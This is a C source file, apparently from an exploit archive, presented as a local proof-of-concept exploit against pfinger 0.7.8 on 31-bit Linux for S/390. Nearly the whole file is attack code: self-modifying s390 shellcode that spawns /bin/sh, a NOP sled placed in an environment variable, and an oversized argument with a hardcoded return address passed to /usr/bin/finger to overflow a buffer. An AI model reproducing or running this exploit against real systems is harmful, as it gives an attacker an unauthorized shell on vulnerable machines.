Exploits/thc390pfinger.c

   1 // linux390 (31bit) pfinger-0.7.8 <= local exploit
   2 // 390 sploit by jcyberpunk@thehackerschoice.com
   3 // diz is just a lame proof of concept sploit
   4 // to show how easy 390linux exploitation is
   5
   6 #include <stdio.h>
   7 #include <unistd.h>
   8
   9 char shellcode[]=
  10 "\x0c\x10"              /* bassm        %r1,%r0                 */
  11 "\x41\x90\x10\x48"      /* la           %r9,72(%r1)             */
  12 "\xa7\xa8\xfb\xb4"      /* lhi          %r10,-1100              */
  13 "\xa7\x68\x04\x56"      /* lhi          %r6,1110                */
  14 "\x1a\x6a"              /* ar           %r6,%r10                */
  15 "\x42\x60\x10\x48"      /* stc          %r6,72(%r1)             */
  16 "\x17\x22"              /* xr           %r2,%r2                 */
  17 "\x0d\xe9"              /* basr         %r14,%r9                */
  18 "\xa7\x68\x04\x7a"      /* lhi          %r6,1146                */
  19 "\x1a\x6a"              /* ar           %r6,%r10                */
  20 "\x42\x60\x10\x49"      /* stc          %r6,73(%r1)             */
  21 "\x0d\xe9"              /* basr         %r14,%r9                */
  22 "\xa7\x68\x04\x57"      /* lhi          %r6,1111                */
  23 "\x1a\x6a"              /* ar           %r6,%r10                */
  24 "\x42\x60\x10\x49"      /* stc          %r6,73(%r1)             */
  25 "\x41\x20\x10\x4c"      /* la           %r2,76(%r1)             */
  26 "\x50\x20\x10\x54"      /* st           %r2,84(%r1)             */
  27 "\x41\x30\x10\x54"      /* la           %r3,84(%r1)             */
  28 "\x17\x44"              /* xr           %r4,%r4                 */
  29 "\x42\x40\x10\x53"      /* stc          %r4,83(%r1)             */
  30 "\x50\x40\x10\x58"      /* st           %r4,88(%r1)             */
  31 "\x41\x40\x10\x58"      /* la           %r4,88(%r1)             */
  32 "\x0d\xe9"              /* basr         %r14,%r9                */
  33 "\x0b\x17"              /* svc n after self-modification        */
  34 "\x07\xfe"              /* br           %r14                    */
  35 "\x2f\x62"              /* /b                                   */
  36 "\x69\x6e\x2f\x73"      /* in/s                                 */
  37 "\x68\x5c";             /* h\                                   */
  38
  39 int main(void)
  40 {
  41  unsigned int i;
  42  unsigned char buf[256],*b;
  43  unsigned char sc[256];
  44  unsigned char nop[]="\x17\x44";
  45  memset(buf,0,256);
  46  memset(buf,'x',160);
  47  b = sc;
  48  for(i=0;i<=100;i++) *b++ = nop[i%2];
  49  *(unsigned long *)(buf+160)=0x7fffff92;
  50  memcpy(&sc[100-strlen(shellcode)],shellcode,strlen(shellcode));
  51  memcpy(sc,"evil=",5);
  52  putenv(sc);
  53  execl("/usr/bin/finger", "finger", buf, NULL);
  54 }